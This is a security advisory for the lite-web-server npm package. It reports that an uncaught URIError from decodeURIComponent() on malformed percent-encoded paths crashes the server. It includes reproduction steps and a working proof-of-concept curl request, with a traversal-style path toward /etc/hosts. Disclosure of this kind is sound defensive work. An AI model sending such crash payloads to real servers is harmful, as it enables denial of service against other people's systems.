lite-web-server
is an HTTP file server that describes itself as "The npm package to create simple web server".
Observations:
- Virtually zero downloads, so the practical impact is small.
- It was last published 6 months ago, so some level of maintenance can be assumed.
Resources:
- Project's GitHub source code: https://github.com/chasyumen/lite-web-server
- Project's npm package: https://www.npmjs.com/package/lite-web-server
If an attacker makes an HTTP request to a server running lite-web-server whose path contains a malformed percent-encoded sequence that decodeURIComponent() cannot decode (for example, percent-encoded bytes that are not valid UTF-8), decodeURIComponent() throws a URIError that nothing catches, and lite-web-server crashes.
The vulnerable code is line 274 of src/WebServer.js, which doesn't handle the exception thrown here:

```js
var _url = decodeURIComponent(req.url).slice(1);
```
- Install the package:

```sh
npm install --save lite-web-server@1.2.2
```

- Create a server.js to serve requests (see below).
- Ensure you have a ./public directory in the current project with at least one file in it.
- Send an HTTP request whose path contains a malformed percent-encoded sequence (%c0%2f is not valid UTF-8, so decodeURIComponent() throws a URIError):

```sh
curl http://10.100.102.7:3000/..%c0%2fetc%c0%2fhosts
```

- Observe that the server crashes.
server.js

```js
var { WebServer } = require("lite-web-server");
var server = new WebServer({
  dir: "./public/"
});
server.start();
```
Liran Tal